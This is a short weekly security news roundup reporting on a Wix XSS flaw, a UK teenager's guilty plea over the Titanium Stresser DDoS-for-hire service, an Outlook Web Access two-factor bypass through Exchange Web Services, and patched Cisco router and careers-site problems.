This Week In Security #6
Security is looking past what you know. With new threats and vulnerabilities found every day we’ll try to give you an organized weekly dose of security news. This is Koda Ops TWIS#6
XSS vulnerability puts many Wix.com users at risk
A recently discovered XSS vulnerability is putting millions of websites and their users at risk of attack. Wix which is a website hosting provider who provides free drag-and-drop website building tools hosts millions of websites with around 87 million registered users – all of which are currently vulnerable to an XSS bug. Hackers can inject malicious code into these websites making users do anything from downloading rootkits, ransomware or even worms allowing the attacker’s virus to spread throughout the user base. This, in turn, can give full access to your website over to hackers. The vulnerability can be easily exploited by adding a single parameter to any site created on Wix.com
DDoS tool creator pleads guilty
A 19-year old UK teenager has pleaded guilty to creating and running the Titanium Stresser an attack-for-hire or “booter” service that could be used to knock Web sites offline. The booter service launched a total of 594 DDoS attacks since its time of its release, according to a statement by the Hertfordshire Police, Adam Mudd developed the tool when he was 15 years old. He went from using it for his own personal attacks to eventually selling it as a service investigators are still working out the total amount Mudd made from the attacks, but their estimate is around $385,000. Investigators determined that Mudd’s tool has contributed to at least 1.7 million attacks worldwide.
Outlooks two-factor authentication can be bypassed
It seems that enterprises and other businesses running exchange server have been operating under a false sense of security in regards to two-factor authentication and its implementations on Outlook Web Access. A weakness in the design of OWA has been exposed allowing attackers to easily bypass 2FA and gain access to an organization’s email boxes, calendars, contacts and more. The problem lies in the fact that Exchange Server also exposes the Exchange Web Services interface which isn’t covered by 2FA. EWS is enabled by default and shares the same port as OWA, meaning an attacker with stolen credentials can remotely access EWS and through that be able to access a user’s inbox.
This week didn’t find Cisco at it’s best while fixing one huge problem another one sprung up for the company. Cisco just got done patching critical bugs in their 900 series routers as well as their prime home server and cloud-based network management platform. The vulnerability that was fixed was a flaw in the Transactions Language 1 (TL1) code of the router which allowed unauthenticated, remote attackers to execute code on the affected system. Cisco has already released software updates to patch this flaw.
But Cisco isn’t in the clear just yet, it seems their professional careers mobile site has a potential data leak, Cisco is blaming this on an incorrect security setting, a setting that has been in place since August of 2015 to 2016. since then the setting has been corrected and users are prompted to change their passwords.
This is this week in security I hope you enjoyed reading, please comment below and stay tuned for more TWIS.